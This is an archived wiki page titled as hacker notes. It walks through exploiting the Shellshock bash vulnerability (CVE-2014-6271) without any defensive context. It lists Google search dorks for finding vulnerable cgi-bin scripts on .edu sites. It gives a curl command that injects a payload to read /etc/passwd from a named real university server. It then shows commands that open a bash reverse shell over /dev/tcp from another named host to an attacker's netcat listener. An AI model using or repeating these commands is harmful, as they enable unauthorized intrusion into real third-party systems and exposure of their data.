Hacker

    版本為 10:05, 15 Nov 2024

    到這個版本。

    返回到 版本存檔.

    查閱目前版本

    A notes for being a hacker

    ShellShock (CVE-2014-6271)

    Scanning the target with Google

    inurl:cgi-bin filetype:sh site:edu
    inurl:/cgi-bin/ ext:sh 
    

    Attempt to get the username remotely

    curl -A "() { :;}; echo Content-type:text/plain;echo; /bin/cat /etc/passwd " http://www.physics.csbsju.edu/cgi-bin/stats/dir.sh
    

    Reverse SHELL

    > php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c ls
     

    if it response as 'Command sent to the server!', continue with the follows

    > php bash.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/here.is.my.IP/4444 0>&1"
    

    Open another terminal. issue the command

    > nc -lp 4444 -vv
    If all goes well, you can issue any commands here. 
    
    Powered by MindTouch Core